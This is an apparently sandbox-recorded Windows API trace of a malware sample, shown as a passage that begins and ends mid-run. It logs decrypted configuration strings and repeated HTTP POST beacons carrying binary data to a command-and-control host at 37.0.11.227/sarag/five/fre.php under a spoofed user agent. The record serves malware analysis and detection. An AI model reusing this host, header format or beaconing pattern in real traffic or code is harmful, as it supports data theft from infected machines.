[0338.660] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0338.661] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0338.664] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0338.665] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0338.666] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0338.666] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0338.667] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0338.667] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0338.667] GetProcessHeap () returned 0x690000 [0338.667] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0338.667] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0338.668] GetProcessHeap () returned 0x690000 [0338.668] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab460 [0338.668] socket (af=2, type=1, protocol=6) returned 0xc24 [0338.669] connect (s=0xc24, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0338.698] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0338.699] GetProcessHeap () returned 0x690000 [0338.699] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0338.699] GetProcessHeap () returned 0x690000 [0338.699] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0338.700] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0338.702] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0338.702] GetProcessHeap () returned 0x690000 [0338.702] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afbc0 [0338.702] GetProcessHeap () returned 0x690000 [0338.703] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0338.703] GetProcessHeap () returned 0x690000 [0338.703] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0338.703] GetProcessHeap () returned 0x690000 [0338.703] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0338.705] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0338.706] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0338.707] GetProcessHeap () returned 0x690000 [0338.707] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0338.707] GetProcessHeap () returned 0x690000 [0338.707] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0338.708] send (s=0xc24, buf=0x6ad508*, len=242, flags=0) returned 242 [0338.709] send (s=0xc24, buf=0x6aba40*, len=159, flags=0) returned 159 [0338.709] GetProcessHeap () returned 0x690000 [0338.709] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0338.709] recv (in: s=0xc24, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0338.815] GetProcessHeap () returned 0x690000 [0338.815] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0338.815] GetProcessHeap () returned 0x690000 [0338.816] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0338.816] GetProcessHeap () returned 0x690000 [0338.816] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afbc0 | out: hHeap=0x690000) returned 1 [0338.816] GetProcessHeap () returned 0x690000 [0338.816] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0338.816] closesocket (s=0xc24) returned 0 [0338.817] GetProcessHeap () returned 0x690000 [0338.817] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab460 | out: hHeap=0x690000) returned 1 [0338.817] GetProcessHeap () returned 0x690000 [0338.817] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0338.818] GetProcessHeap () returned 0x690000 [0338.818] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0338.818] GetProcessHeap () returned 0x690000 [0338.818] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0338.819] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1974) returned 0xc24 [0338.824] Sleep (dwMilliseconds=0xea60) [0338.827] GetProcessHeap () returned 0x690000 [0338.827] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0338.828] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0338.829] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0338.836] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0338.836] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0339.076] GetProcessHeap () returned 0x690000 [0339.076] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0339.077] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.077] CryptImportKey (in: hProv=0x6af188, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0339.078] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.079] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0339.081] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.084] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0339.084] GetProcessHeap () returned 0x690000 [0339.084] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0339.085] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.085] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0339.086] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.087] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0339.088] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.088] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0339.088] GetProcessHeap () returned 0x690000 [0339.088] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0339.089] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0339.090] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0339.091] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0339.094] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0339.094] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0339.095] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0339.096] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0339.096] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0339.096] GetProcessHeap () returned 0x690000 [0339.096] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0339.096] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0339.097] GetProcessHeap () returned 0x690000 [0339.097] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0339.097] GetProcessHeap () returned 0x690000 [0339.098] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0339.098] GetProcessHeap () returned 0x690000 [0339.098] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0339.098] GetProcessHeap () returned 0x690000 [0339.098] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0339.099] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.100] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0339.109] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.110] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0339.119] GetProcessHeap () returned 0x690000 [0339.119] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0339.120] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.120] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0339.121] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.122] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0339.123] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.123] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0339.123] GetProcessHeap () returned 0x690000 [0339.123] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0339.124] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.127] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0339.128] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.128] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0339.129] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.129] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0339.129] GetProcessHeap () returned 0x690000 [0339.129] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0339.130] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0339.130] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0339.131] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0339.131] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0339.132] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0339.132] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0339.133] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0339.133] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0339.133] GetProcessHeap () returned 0x690000 [0339.133] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0339.133] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0339.133] GetProcessHeap () returned 0x690000 [0339.133] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3b0 [0339.134] socket (af=2, type=1, protocol=6) returned 0xc28 [0339.134] connect (s=0xc28, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0339.162] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0339.162] GetProcessHeap () returned 0x690000 [0339.162] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0339.162] GetProcessHeap () returned 0x690000 [0339.162] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0339.163] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0339.164] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0339.165] GetProcessHeap () returned 0x690000 [0339.165] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af440 [0339.165] GetProcessHeap () returned 0x690000 [0339.165] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0339.166] GetProcessHeap () returned 0x690000 [0339.167] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0339.167] GetProcessHeap () returned 0x690000 [0339.167] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0339.170] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0339.171] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0339.171] GetProcessHeap () returned 0x690000 [0339.171] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0339.171] GetProcessHeap () returned 0x690000 [0339.172] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0339.172] send (s=0xc28, buf=0x6ad508*, len=242, flags=0) returned 242 [0339.172] send (s=0xc28, buf=0x6aba40*, len=159, flags=0) returned 159 [0339.173] GetProcessHeap () returned 0x690000 [0339.173] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0339.173] recv (in: s=0xc28, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0339.256] GetProcessHeap () returned 0x690000 [0339.257] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0339.257] GetProcessHeap () returned 0x690000 [0339.257] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0339.257] GetProcessHeap () returned 0x690000 [0339.258] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af440 | out: hHeap=0x690000) returned 1 [0339.258] GetProcessHeap () returned 0x690000 [0339.259] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0339.259] closesocket (s=0xc28) returned 0 [0339.259] GetProcessHeap () returned 0x690000 [0339.259] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3b0 | out: hHeap=0x690000) returned 1 [0339.259] GetProcessHeap () returned 0x690000 [0339.260] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0339.260] GetProcessHeap () returned 0x690000 [0339.260] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0339.260] GetProcessHeap () returned 0x690000 [0339.260] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0339.261] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1978) returned 0xc28 [0339.339] Sleep (dwMilliseconds=0xea60) [0339.341] GetProcessHeap () returned 0x690000 [0339.341] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0339.341] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.342] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0339.360] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.361] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0339.398] GetProcessHeap () returned 0x690000 [0339.398] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0339.399] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.400] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d628) returned 1 [0339.400] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.401] CryptSetKeyParam (hKey=0x69d628, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0339.401] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.402] CryptSetKeyParam (hKey=0x69d628, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0339.402] GetProcessHeap () returned 0x690000 [0339.402] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0339.403] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.404] CryptDecrypt (in: hKey=0x69d628, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0339.404] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.405] CryptDestroyKey (hKey=0x69d628) returned 1 [0339.405] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.406] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0339.406] GetProcessHeap () returned 0x690000 [0339.406] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0339.407] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0339.407] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0339.411] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0339.412] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0339.413] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0339.413] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0339.414] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0339.414] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0339.414] GetProcessHeap () returned 0x690000 [0339.414] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0339.414] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0339.415] GetProcessHeap () returned 0x690000 [0339.415] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0339.415] GetProcessHeap () returned 0x690000 [0339.416] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0339.416] GetProcessHeap () returned 0x690000 [0339.417] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0339.417] GetProcessHeap () returned 0x690000 [0339.417] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0339.418] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.418] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0339.428] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.436] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0339.444] GetProcessHeap () returned 0x690000 [0339.444] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0339.445] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.446] CryptImportKey (in: hProv=0x6af078, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0339.447] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.448] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0339.449] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.449] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0339.449] GetProcessHeap () returned 0x690000 [0339.450] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0339.450] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.451] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0339.452] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.452] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0339.453] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0339.453] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0339.453] GetProcessHeap () returned 0x690000 [0339.453] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0339.457] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0339.457] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0339.458] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0339.458] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0339.459] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0339.459] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0339.460] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0339.460] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0339.460] GetProcessHeap () returned 0x690000 [0339.460] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0339.460] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), 